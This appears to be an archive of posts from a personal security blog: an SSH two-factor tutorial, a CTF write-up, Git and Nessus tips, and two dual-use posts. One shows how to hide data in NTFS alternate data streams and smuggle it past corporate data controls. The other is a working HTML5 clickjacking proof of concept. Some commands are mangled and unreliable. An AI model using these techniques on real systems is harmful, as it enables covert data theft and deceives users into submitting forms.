Moved Posts

Cross-Post: Exploiting Windows 2008 Group Policy Preferences – Expanded

Cross posting some work of a friend of mine that I was helping with, I say “helping” in the lightest form of the word (I had a domain controller ready to test, he didn’t).

Meatballs (over at: has been doing some work attempting to put together a metasploit module to decrypt passwords found within the sysvol folder on win2k8 domains.

However rather than just settle for the disclosed “local users and groups are vulnerable…” he dug a little deeper after realising that datasources and other such things that have user credentials associated with them were also stored in the same manner.

What follows is a snippet from his blog, visit his site for the full article.


This follows on from the disclosure which discussed how Group Policy Preferences can be used to create Local Users on machines and the resulting passwords easily decrypted. (Expect a metasploit post module to gather these details soon…)

Browsing the MSDN documentation I noticed that there were many other preferences that could be set that, and delving further they also allow a password to be stored. For example Services.xml specifies services to run on end machines, and can specify a specific user and password for that service to run under.

Whilst these preferences may not be used as commonly as local users preferences (to set local administrator passwords), they may lead to current valid domain credentials rather than just local users accounts – for example specifying a domain user to connect to a network share in Drives.xml… (read more)

The finished result when run against my little 2k8 test domain.


Moved Posts

Adding Google Authenticator 2-Factor Auth to an OpenVZ VPS

…running Centos 6.2

After seeing a great little tutorial courtesy of @hak5darren I decided to implement this on my VPS box to provide a little extra security while removing the need for private keys.

Granted I can still use private keys at home but it’d be nice to have access to my box when I maybe don’t have access to my private key or using it via an internet cafe.

Step One: Make sure your time is set correctly

Everything we will end up doing is to set up a time sensitive token. If your server is not running on the same time as your mobile phone/authenticator then you’re going to find yourself unable to log into your machine.

In OpenVZ you are unable to use NTP to sync up time or manage timeservers and so you’re stuck to what your physical host is using. Providing your provider is decent enough and is ensuring his physical hosts are kept up to date you shouldn’t have a problem.

If you follow these next steps and your time is still out of sync, you’ve got a problem that I can’t solve. Contact your provider and get him to sort out NTP on his physical hosts.

As you can’t use NTP yourself to set the time, you have to set the correct “offset”. You do this by:

  1. rm /etc/localtime && ln -s /usr/share/zoneinfo/Europe/London /etc/localtime && date

Make sure you set the timezone appropriately for your area. The output should be in sync with your local time now.

Step Two: Get hold of the Google Authenticator PAM

The Pluggable Authentication Module (PAM for short) is available from:

wget and extract the source tarball:

  1. wget && tar jxvf libpam-google-authenticator-1.0-source.tar.bz2
  2. Ensure you have the development tools installed: sudo yum groupinstall “Development Tools”
  3. Ensure you have the pam development libraries installed: sudo yum install pam-devel
  4. cd libpam-google-authenticator-1.0
  5. sudo make install

With no errors you should now have two files contained within /lib64/security and /usr/local/bin

  • google-authenticator

Step Three: Lets start configuring it

First the system authentication…

Copy the following line into your /etc/pam.d/sshd configuration file.

  • auth    required              

You can add the above to the system-auth file if you wish but expect problems if you’re running X. I only have a single service I want to protect so I’ve added it as per Darren’s instructions to the service’s configuration file.

Note that each stack (auth, account, session, etc…) is executed in line order. So if you place the above line after the line within the auth stack that deals with “password”, it’ll request a password first, if you place it above the password line, it’ll request a verification code first.

Any references to “include” means that it defers that point of the stack to another file under /etc/pam.d/ so if you want to fine tune where the google authenticator module is called, you’ll need to follow the stack.

Once you’ve added the above line edit your /etc/ssh/sshd_config file to make use of challenge_response authentication.

  • Ensure “usepam” is set to yes
  • Ensure “ChallengeResponse Authentication” is set to yes – This is the “Something I have” factor
  • Enable Password Authentication – This would be the second “something I know” factor.

Another thing to note is make sure that your login grace time is set to something sufficiently large enough for you to type in both the authenticator code and your password. I had mine set to 10s to allow me to type in a keyphrase for my private key, but kept finding my login timing out after submitting a verification code but before I could finish typing my password when using 2FA.

With all the above done you’re now ready for step 4.

Step 4: Configuring your user account

As your normal user enter the following command:

  • google-authenticator

The following exchange will take place. Answers are down to your preferences except for where I’ve marked it in bold.

[user@boxen libpam-google-authenticator-1.0]$ google-authenticator
Do you want authentication tokens to be time-based (y/n) y….
Your new secret key is: AAAAAAAAAAAAAAAAAAAAAA
Your verification code is 111111111111111111111
Your emergency scratch codes are:
Do you want me to update your “/home/user/.google_authenticator” file (y/n) y

Do you want to disallow multiple uses of the same authentication token?
This restricts you to one login about every 30s, but it increases your chances to notice or even prevent man-in-the-middle attacks (y/n)

By default, tokens are good for 30 seconds and in order to compensate for possible time-skew between the client and the server, we allow an extra token before and after the current time. If you experience problems with poor time synchronization, you can increase the window from its default size of 1:30min to about 4min.

Do you want to do so (y/n)

If the computer that you are logging into isn’t hardened against brute-force login attempts, you can enable rate-limiting for the authentication module. By default, this limits attackers to no more than 3 login attempts every 30s.

Do you want to enable rate-limiting (y/n)

Navigate to the URL given to you within the output.

  • Using the Google Authenticator app on your phone, add an account and select “scan barcode”
  • Position camera to view the QR code presented to you at the above URL

The Google Authenticator Application will automatically add an account with a value which will update every 30 seconds or so.


Now restart your sshd server using:

  • sudo service sshd restart


  • sudo /etc/init.d/sshd restart

And before you log out of your current session. Open up a secondary putty window and attempt to login using your google verification code and a password (obviously having set one for your user).

Step Five: …now you’re auth’n with google

Providing the last step worked, you’re all sorted. Google authenticator is working for you.


Otherwise, undo the above changes and give up as I have no idea what went wrong and if you logout you’ll likely lock yourself out of your machine.

Moved Posts

Mini Rant – Security that makes no sense…

In my line of work we encourage encrypted communications and securing sensitive data especially when it comes to PII.

However it’s increasingly common to see systems put into place that are obviously only there to mitigate litigation aspects should anything go wrong.

Take American Express for example:

An email from them asking you to send a copy of your passport/driving licence/etc… to confirm your identity suggests that you may reply via email however:

Please note that the internet can be insecure. You must use a secure encryption method when sending personal data and/or documentation to us via email to safeguard your personal data

Great… you encourage your customers to encrypt their personal data.

So I’ll just send over a truecrypt volume encrypted with twofish-aes-serpent shall I?

Or perhaps a PGP encrypted volume, whats your public key?

What about just an AES256 encrypted zip?

Okay so that’s point 1.

  • They’ve suggested that it is on the customers own head to protect their data. However they have not listed the accepted formats of encryption that they use.

So we’re assuming because they’ve not provided us with a public key they don’t want pgp or gpg encryption. They want something simple that doesn’t require too much infrastructure in place so we’ll go with the AES256 encrypted zip, which providing they have winzip/7zip/*ziprarace client means they can enter in a password and decrypt the contents.

Great, so how do I get the password to you?

AMEX are right, internet communication via email is all in the clear, so if someone was in the middle of my traffic (i’m on a corporate network, chances are they’re monitoring it at least so files could be logged or archived in an antivirus mail gateway for example) they could intercept the cleartext data and have my passport details.

So I encrypt it and send it via email, attacker or corporate network now only has an encrypted zip file.

How do AMEX suggest I send a password to them? I call their customer service desk, expecting them to give me a number to SMS it to or a voice service that instead reads me a password when I dial the number and enter my reference code?

Oh you just send it via email. I think you’re meant to send it all together

…I explain my concerns..

Erm, I’ve never been asked that before I guess I could give you another email address to send it to

Point 2:

  • Sending encrypted data along with the password in the same email is as good as sending cleartext data.
  • Sending encrypted data along with the password via the same mechanism is as good as sending cleartext data.

So despite all of AMEX’s good advice above “You must use a secure encryption method…” actually there is no way to use a secure encryption method to keep your data safe when dealing with them.

Extra Note:Along the same lines, as I mention above I regularly get asked to encrypt reports that are deemed commercially sensitive. So I email out the encrypted zip file, and they request that I SMS them the password.

2 minutes later, their blackberry chirps… twice*.

*Did you guess what just happened?

Their blackberry received both the encrypted zip and the plain text password. Loss/Theft of the blackberry once again could result in the loss of commercially sensitive data.

Moved Posts

NFTF: Useful urls for malware investigations

Figured I’d keep a copy of this on here for the next time I need to do malware investigation. – checks URL’s against lots of blacklists, emergingthreats, malwaredomainlist and zeustracker/etc… – Same as above but for IP addresses – Searches above databases and records logs of abuse claims. Useful as it can sometime give you extra URI’s for a host to comb your logs for. Also usefully gives you the date that its crawler last was able to pull down the malicious binary. – Provides an assessment according to the type of nastiness a domain or IP is associated with. – Provides a blacklist DNS entry head to the downloads page, open the text file version and CTRL-F to search. Will give reason for blocking (i.e. listed in along with the date. – Provides a listing of hosts and ip’s known to be associated with malware. – Provides snort rules configured to detect malicious traffic/hosts. – Advanced DNS lookups, links hosts to nameservers, can give aliases and associated subdomains as well as any shared hosts. – Basic network tools, whois, dns, traceroute, etc… useful for performing checks NOT from your own ip 🙂 – lists zeus C&C nodes – lists spyeye C&C nodes


Be careful if you use any of these tools on the affected network as often it will contain the hostname or IP you’re looking for in the request parameters which means they’ll flag you up as an infected laptop without looking at the actual URL you’re browsing to (happened to me previously).

*10/06/12 – Correction courtesy of Steven B: I originally had “” listed instead of, thanks for the heads up.

Moved Posts

NFTF: Alternative Data Streams – bits and pieces.

To those not familiar with the world of NTFS. It offers a feature known as Alternate Data Streams which can allow a user to create hidden content attached to a file.

Typically generated using echo or type it normally requires a command prompt to get to generate these files or view the files.

However an alternative method in XP and 2K/2K3 series of operating systems was to add data to the summary properties of a text document created in notepad as it turns out this data was held within an ADS associated with the original text file.

What happens if like me last week you find yourself on a system with a tight group policy forbidding command line access and an execution arbiter that worked from a whitelist of very very few programs?

You get creative.

I know:

type hideme.txt > public.txt:hideme.txt

will generate an ADS.

I also know that typing

notepad c:pathtopublic.txt:hideme.txt

will let me edit the contents of hideme.txt which would not ordinarily be accessible by any other means.

Unfortunately opening a file in notepad and throwing public.txt:hideme.txt as a filename within the save as box will not work as windows dislikes the colon.

But what else runs console commands?

Batch files – nope not in this case, execution arbiter stops batch files running.

What about shortcuts?

Bang on.

Right click “Create New -> Shortcut”

Enter in “notepad” without quotes as the target, and complete the wizard with defaults.

Right click the created shortcut change the target field to show

%windir%/system32/notepad.exe "c:pathtopublic.txt:hideme.txt"

Save the changes and double click the shortcut.

Pow! You’re now editing an ADS attached to the public.txt file that you had available earlier, ADS created and without additional tools you’re free to hide data away from an administrators prying eyes on a system that gave you no access to a command prompt, stopped you running Batch files and more…

What Next

So with that juicy thing done what else could I do? What about exporting sensitive company data? Maybe the customer contact list for a company or medical records or financial details?

Hmm okay so I’m going to have to get it off the system some how, but the company is smart and doesn’t allow the use of USB drives so I can’t use an NTFS formatted USB drive to export data (on non NTFS file systems the ADS is dropped as it’s not supported).

What about CD? Well I did say on non NTFS file systems the ADS disappears. It’s true for CDs ISO9660 and UDF formats don’t support alternate data streams so you’re stuck again.

Except, what if you change the file?

What if you zip it? then burn the zip?

Well sad to say using WINZIP v14+ and the default compressed folders function in windows, I believe you’re out of luck, both tools appeared to just drop the ADS content on the floor.

Using winrar however to create the zip… I’ve shown that it maintains the ADS across filesystems, now my test was using a local FAT32 formatted partition and an NTFS one, I didn’t actually burn it to CD-ROM so it may not be the case but it’s certainly looking promising.

If it is the case, having the ability to covertly export and import information using ADS suddenly becomes a big issue.

I plan on looking into it a bit more as it could have just been a series of flukes that worked for me but it was definitely promising.

My initial thoughts for this are: uuencoded zip file (ASCII friendly so will play nice as ADS content) containing lots of juicy personal information that shouldn’t be leaked. Add to a benign text file expected to leave the building. Winrar zip the lot, burn to CD… get home and do the reverse.

Ba doom boom! You’ve just circumvented the whole lot of data controls put in place to protect a companies data.

Moved Posts

My first CTF – PlaidCTF 2012

So it was the same as any other usual Friday, 10pm I’m shattered after a particularly taxing week at work so laying in bed reading a book (the rock and roll lifestyle of a social pariah) when I get a text from a colleague

Dude, what are you doing this weekend? I’m just about to take part in a CTF, get online #corelan on freenode

A CTF? To those who don’t possess the knowledge of the internet, a CTF is a “capture the flag” competition. In the world of computer security it means a race against other teams to break a number of challenges for points and what do points mean?…. prizes!

1st, 2nd and 3rd placing teams would get some nice money. I’ll end the anticipation and say that our team (corelan from came somewhere around 140th place out of about 800 teams.

Me and a colleague got involved from Friday night, straight away i’m in over my head. Wait what’s this? an RPG?? wtf? How do I see the? We’re using what to track progress? Who is doing what? How? Eh? Help!!?

About 3 hours later when I realise how I access challenges and give up trying to fix the constant 404 errors on the python client that pCTF had provided for access I finally try getting my teeth into something.

Right, where to start. I select a challenge and instantly realise it’s a binary exploitation task. I’ve only just started reading about the joyous things such as ollydbg and ida pro so I’ve no idea what i’m doing or looking for I quickly move onto something else.

I try out the addition is hard challenge and decide that the clue PHP? in the second argument must mean that it’s something PHP does that’s wrong.

I start googling for PHP Hex and looking through the manual for functions that deal with hexadecimal numbers and find hex2dec as a function… wrong key. I give up after trying a few more things and getting nowhere but i’m adamant that it’s something to do with the way that PHP does hex based stuff surely?

I move onto… Editors

Decipher a keylogger script output and determine:

  1. How many shells were spawned
  2. How many edits were made to the /etc/sudoers file
  3. What the final state of the /etc/sudoers file is
  4. What the final state of the computer is

So I grab the text file and instantly realise that i’m missing something, viewing it in notepad all of the control chars are either weird characters or completely ignored so back into ViM it goes.

Ahh more like it.. now I can see all the ctrlA and CtrlB’s made for control of screen and tmux, gets me closer to understanding just how many shells are opened 🙂

I spend the next few hours deciphering the script and break it down into steps.

Just by following the script through in my head and using a piece of A4 paper I draw out what happens and come out with an answer. I give it a go – Nope wrong key.

… this continues for many hours, only now I’m having less confidence in my paper based decode I decide to load up a fresh VM (a nice fresh install of debian) and install the necessary editors (again fresh installs so no custom .rc files screwing up things) and walk through the script.

1st Error: ksu -l is not a valid command without some numbers after it. It just doesn’t work, it bombs out and errors.

I’m on IRC so I fire off a question to the creator FrozenCemetary and ask if that’s intentional or just a typo? I get the response that “not all KSU implementations are the same” and assuming that’s a clue to say that his didn’t fail in that manner. I continue with it, assuming it works.

Try the key – No dice.

Okay so carrying on. There is a section involving teco (an obscure ancient editor that emacs was based on) and I am encountering errors trying to run one line of the code, but wikipedia says it’s an output only line anyway, not a write line so i’m not that concerned. Still I double check and realise I’m typing o instead of 0 *facepalm* I correct the problem and the code runs without error. It’s only a read command, no changes.

there’s a section that starts up VIM using visudo and edits the line with a “/usr/bin/vim ,” yeah, including the space and a comma. It’s an invalid line, visudo correctly barfs out but the next key press kills the shell that visudo is in so the write never gets corrected and never gets written. I double check if any editors should be barfing out when writing and frozen comes out with the surprising answer of “None of the editors should barf when saving changes”.

This means I’ve been assuming VIM fails to update the editors line in /etc/sudoers when in fact Frozen has just said it’s a typo and is meant to succeed. I change my answer and try the key.

No good.

Onto the next bit, we’ve got some crazy emacs char moving nonsense involving 46 control characters. It works a bit odd and I end up deleting characters from the line below the editors line, not the editors line. Confused I contact frozen again. “I’m trying this and I think the control characters are moving the cursor too far, when you drew up the challenge, were your arguments seperated with spaces or tabs?”

Frozen: “It should be pretty obvious what’s intended, its a vanilla debian sudoers file and i’m pretty sure it was spaces not tabs”

Ah, so that explains a lot I grab another vanilla debian image, build a VM and have another go… nope definitely tabs once again, but lets just entertain Frozen’s suggestion and convert it to spaces.

Right so typically 4 tabs to a space, lets go with that.

Try it again and now it sort of works except it deletes the 2nd / when I run it.

I try the key once more, nope it fails I try again manually re-adding in the /

Again no dice.

Confused by this now and not having anything else confusing left to look at I download centos 6, centos 5, debian, ubuntu server, backtrack 5r1 and kick off VM’s of all of them, run through it and the same result every time.

A fresh install of emacs treats tabs as tabs, not spaces and all of them end with the same outcome.

Try the key again (maybe I have the input wrong), nope no go.

It’s 5am now so I call it quits on the saturday morning and get some kip.

Saturday noon I’m back up and at it again. Meatballs (my colleague) is online too and looking back at the addition is hard challenge. He gets lucky with a google search “php hex addition” and finds the bugged hex addition function within a particular version of php, does the addition and pow! gets the key.

Meanwhile I get back onto the editors problem and try a few more things and get nowhere. So now I start looking at the stuff I was sure about.

/sbin/poweroff, if you run it in run level 6 without any arguments it’ll reboot the machine, meaning the final state of it will be “on”. However in run level 3 without any arguments it will shutdown the machine, meaning the final state will be off.

Assuming that it could be either may be throwing me off so I refresh the installs of all the above, fire up a bash process watcher (watch ‘ps -ef | grep bash | grep -v grep | wc -l’) in each of them, and try the script in all.

I come out with 2 answers, 1 with the state on and 1 with the state off. I submit both types of keys – no good.

Frustrated and annoyed at the challenge I give up and move onto a web based challenge that involves a homemade pastebin type app.

At this time I’m chatting in the corelan channel we’re using for the CTF and Chad2k comes online, he appears to be a guru on the web app side, discovers the admin cookie and realises that there is some remote file inclusion up for grabs so starts trying to get simple php echo scripts to work but stalls a bit. In the meantime holding onto his coattails I get my php script doing an ls and print_r works and causes some output.

Doesn’t matter though because by this time Chad is performing SQL injection and extracts all the pastes… at this time we could very well have gotten owned ourselves as it was obvious everyone else had put stuff in the database before us, meaning we were bombarded with XSS everywhere (thank god I was doing this in a VM).

Theres nothing interesting in the pastes in the DB despite the clue suggesting it so the next stage is to get a shell working on the site. Chad once again gets it up and running, an ls of the directory reveals a key.html and inside of it (contained within HTML comments) is the key we need to score.

Blam Corelan reaches 140 points. Only a few hours to go and I decide to have a look at an “easy” binary challenge called “Format”.

I whack it into ida pro and find a password stored in plaintext in .rodata and that gets me past stage one, however the rest just falls on it’s arse, I try stepping around some comparisons to get it past the stage im stuck on but again get nowhere.

With 20 minutes to go I’ve given up really and just start looking through the challenges to see if there is anything I could have a go at and have a chance of doing it. I find 3D, which appears to be a 3D image containing a key that is masked by an object.

Knowing that 3D images are generated normally by a left and right image, I’m guessing that there must be one image that has a clear shot of the obscured key.

Only problem is I don’t know how to see it, so I fire it up in HxD to see the code, maybe it’ll give me a clue.

I see lots of repeated EXIF header declarations and come to the conclusion it’s not just 2 JPG images but a whole stack of images. Again I’ve no idea what the end of a JPG looks like in byte form so I couldn’t use HxD to split out the images.

I vaguely remember seeing Int0x80 demonstrating something called ‘scalpel’ on Hak5 for recovering data from hard drives and I was wondering if I could use it to extract the JPGs for me (a sort of dumb and blind “find me images duh”).

I give it a try but without being sure it was just JPGs I enable all the images stuff within the .cfg.

It finds 15 jpgs and 7 Tiff files. All corrupt, none of the images load.

I try again with just the jpg filter and it finds 15 jpgs, again all corrupt.

Thinking maybe its a common 3D image format I start downloading medical image viewers that are designed to view slices of 3D MRI’s and Xrays.

No good, they all bomb out. I’ve not got any time left and the CTF ends without me contributing in a points manner to the team 🙁

I’m gutted but have learned a hell of a lot over the weekend. Exhausted I call it quits for the night and head to get my beauty sleep.

Post Event

I learned that on the editors question, I was so close to the answer it was ridiculous. I failed not because I was doing something wrong, but because the challenge was insufficiently deterministic. It was incredibly difficult to predict the conditions in which the challenge was created and as such only 20 teams passed that particular challenge, I think i’m one person who tried the most on it as well (spent pretty much all my time on it including installing the various OSes).

The 3D image… again pure dumb unluckyness meant I chose the wrong tool for the job. I was going along the right lines it was indeed just nested JPG images. If I had used foremost -t jpg filename, it would have extracted 21 jpg’s and I’d have been able to view the key.

Alternatively just loading it up in a modern copy of VLC media player would let you view it too.

Still despite the close failures, I learned so much especially at the hands of the guys in the corelan team and it was incredibly enjoyable. Going to try and keep in contact with the #corelan folk and get involved next time there is one.

Fingers crossed I get to practice my binary exploitation before the next one. Defcon 20 prequals here we come 🙂


Apologies for not including the code and screenshots I wanted to include in the above post. Just a case of writing this and not having access to them on this laptop, might get “a round tuit” at some point in the near future.

Moved Posts

NFTF: Pushing tags to Git Repositories – Converting puttygen keys to openssh versions

I’m working on a side project that has me contributing to a GIT repository for source control.

Great! Only I haven’t got a freaking clue how to use it properly.

First in the list:

Pushing “Tags” up to the master repository

First thing to note is that tags are typically only noted on your local copy of the repository. They aren’t pushed up to the origin when you make a Git Push, unless you specify otherwise.

This is fine and dandy if you’re using the command line git client from the off. Me, I was using TortoiseGIT on windows, bypassing the whole setting up of GIT Bash and there isn’t a simple checkbox that I’ve found in TortoiseGIT that says “push tags” along with a Git Push. So I needed to set it up.

The command that you have to run is:

git push origin --tags

This will push any tags that you have associated with your code (TortoiseGIT can create them by just rightclicking your repository and select “add tag”) up to the origin on your master repository (in my case hosted on assembla).

However before you get to that step you’ll need to have set up your GIT Bash first, and in my case as assembla uses PKI for authentication I would need to either:

a. Create a new key for the same computer, just for the GIT bash instance and add it (what i’ve typically done in the past, but loathed because it’s just duplication of effort)

b. Figure out why “export OpenSSH version” of my keys from puttygen has never actually just worked for me.

This time around I opted for b.

Converting PPK to id_rsa

I found this answer courtesy of stackoverflow and a user called Kaleb Pederson it is as follows:

  1. Open PuttyGen
  2. Click Load
  3. Load your private key
  4. Go to Conversions->Export OpenSSH and export your private key
  5. Copy your private key to ~/.ssh/id_rsa (or id_dsa).
  6. Create the RFC 4716 version of the public key using ssh-keygen
  7. ssh-keygen -e -f ~/.ssh/id_rsa > ~/.ssh/
  8. Convert the RFC 4716 version of the public key to the OpenSSH format:
  9. ssh-keygen -i -f ~/.ssh/ > ~/.ssh/

With that done, your GIT bash should now be able to authenticate correctly to your Git repository using the PPK you already use for TortoiseGIT.

Moved Posts

Leveraging HTML5 in order to turbo-charge clickjacking

You have a website and you’ve proven it’s vulnerable to clickjacking, but what use is fooling a user into submitting a form unless you can specify some of the data that the user is submitting within those fields?

We’ve all played games online where you have to match up words to phrases or maybe things like the “impossible game” where you drag the words to the respective colours.

What about turning a harmless game such as the above into a form submission machine of awesome. Well now with HTML5 – you can!

It’s all thanks to the drag-and-drop method and in particular the ondragstart method.

draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')"

use that on anything you want to make draggable – in my testing I opted for a simple <div> containing a string, and ask the players to drag and drop the string onto the correct corresponding sentence.

When they click the “answer” button, it submits the jacked site.

So.. users drag the word CSS across to Cascading Style Sheets – enters “Rick Astley” into the search field of

then users click the “answer” button – submits the video search

Now ideally if google didn’t have x- headers set that forbid the use of google in an iframe I’d have gone and “i’m feeling lucky”d it but sadly no autoplaying rick astley for me.

Still the premise is proven.



Now with added code! and a demonstration video.

Video Here: [youtube]

I’m no web developer and quickly ran out of patience when working on the positioning issues so feel free to take, improve and build on it. I was merely creating this just to play with some of the features of HTML5.


<html>  <head>    <title>HTML Clickjacking demonstration - drag and WTF!?</title>    <style>      iframe{position: absolute; top:0px; left:0; filter: alpha(opacity=0); opacity:0;z-index:1}      button{position: absolute; top:40px; left: 805px; z-index:-1; width:107px; height:26px;}      .magicfield1{position: absolute; top:40px; left: 340px; z-index:-1; height: 26px; border: 1px solid orange}      .magicfield2{position: absolute; top:40px; left: 480px; z-index:-1; height: 26px; border: 1px solid orange}      .magicfield3{position: absolute; top:40px; left: 650px; z-index:-1; height: 26px; border: 1px solid orange}      .magictext{position: absolute; top:54%; left: 50%; z-index:-1; }      .showhider{position: absolute; top:90%; left: 1%}      .intro{position: absolute; top:50%; left:0}    </style>    <script type="text/javascript">      function mask(){        document.getElementById("iframe").style.opacity = ".1"; // for most browsers          document.getElementById("iframe").style.filter = "alpha(opacity=10)"; // for IE      }      function hide(){        document.getElementById("iframe").style.opacity = ".0"; // for most browsers          document.getElementById("iframe").style.filter = "alpha(opacity=0)"; // for IE      }      function show(){        document.getElementById("iframe").style.opacity = ".9"; // for most browsers;          document.getElementById("iframe").style.filter = "alpha(opacity=90)"; // for IE        }      function reveal(){        alert("Checking your answer...");        document.getElementById("iframe").style.opacity = ".9"; // for most browsers        document.getElementById("iframe").style.filter = "alpha(opacity=90)"; //for IE      }    </script>  </head>  <body>    <div class="intro">      <p>Hello and welcome to the match game</p>      <p>All you have to do is drag the following 3 letter acronym to the matching string ---> </p>      <p class="showhider">As you know it's a test - Show iframe - Hide iframe - Mask iframe </p>    </div>    <div class="magictext" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')">      <H1 style="border: 1px dashed black">CSS</H1>    </div>        <span class=magicfield1>Cross Site Scripting</span><span class=magicfield2>Cuddly Slippery Snakes</span> <span class="magicfield3">Cascading Style Sheets</span>    <button>Answer</button>  </body></html>

Pastebin Link:

Moved Posts

msfupdate on Backtrack 5r2

Having annoying SVN issues trying to run msfupdate on your BT5R2 install?

Something along the lines of “no version information found”.

Try this:

cd /opt/metasploit/common/libmv -s /usr/lib/ -s /usr/lib/

The above was obtained off of the backtrack forums but given the numbers of threads on that thing with similar topics, I’m guessing not a lot of people are seeing the actual solution.

As with everything I post, it worked for me but your mileage may vary.

Moved Posts

Nessus 5.0 on Backtrack 5r2 Continued…

So you’ve followed the instructions in my previous post alright and gone to browse to http://localhost:8843, have already pre-empted the no-script nags by allowing all scripts from localhost (or whatever your paranoia level allows you to do) and still can’t get past that annoying “Nessus requires flash player 10.2 or later” message.

Don’t fear and don’t bother following any other horrible tutorial that involves shoving an old piece of flash software on your system. It’s time to go for the bleeding edge.

Within a terminal type:

wget xvzf install_flash_player_11_linux.i386.tar.gzmkdir ~/.mozilla/pluginsmv ~/.mozilla/plugins/

Then just delete everything else that got extracted.

Yes it’s the 32bit flash – but it works.

Yes I know, it’s not the 64bit flash… but it still works on the x64 install of BT5R2 and does the job for accessing nessus.

Now you can browse to http://localhost:8834, create your user, ignore the bit about “enter your feed” details if it comes up (close the browser and re-open it) and voila… nessus 5.0 on bt5r2.